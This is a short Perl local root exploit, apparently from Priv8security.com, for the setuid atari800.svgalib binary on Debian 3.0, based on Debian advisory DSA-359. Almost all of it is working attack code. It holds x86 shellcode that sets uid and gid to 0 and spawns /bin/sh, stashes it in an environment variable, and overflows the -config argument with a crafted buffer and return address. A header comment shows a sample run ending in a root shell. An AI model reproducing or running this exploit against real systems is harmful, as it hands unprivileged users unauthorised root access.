#!/usr/bin/perl ###################################################### # Priv8security.com atari800 local root exploit. # # Tested against Debian 3.0 # Based on http://www.debian.org/security/2003/dsa-359 # # wsxz@debian:~$ perl priv8atari800.pl # Priv8security.com atari800.svgalib local r00t exploit!! # usage: priv8atari800.pl offset # Using address: 0xbfffffb9 # User config file # 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... # Aÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿' not found. # sh-2.05b# id # uid=0(root) gid=0(root) groups=1001(wsxz) # ##################################################### $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0 "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0 "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69". "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; $path = "/usr/bin/atari800.svgalib"; # $retaddr = 0xbffffb90; $retaddr = 0xbffffffa - length($shellcode) - length($path); $offset = 0; $offset = $ARGV[0]; print " Priv8security.com atari800.svgalib local r00t exploit!!\n"; print " usage: $0 offset\n"; print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n"; $newret = pack('l', ($retaddr + $offset)); $buffer = "A" x 234; $buffer .= $newret x 6; local($ENV{'WSXZ'}) = $shellcode; exec("$path -config $buffer");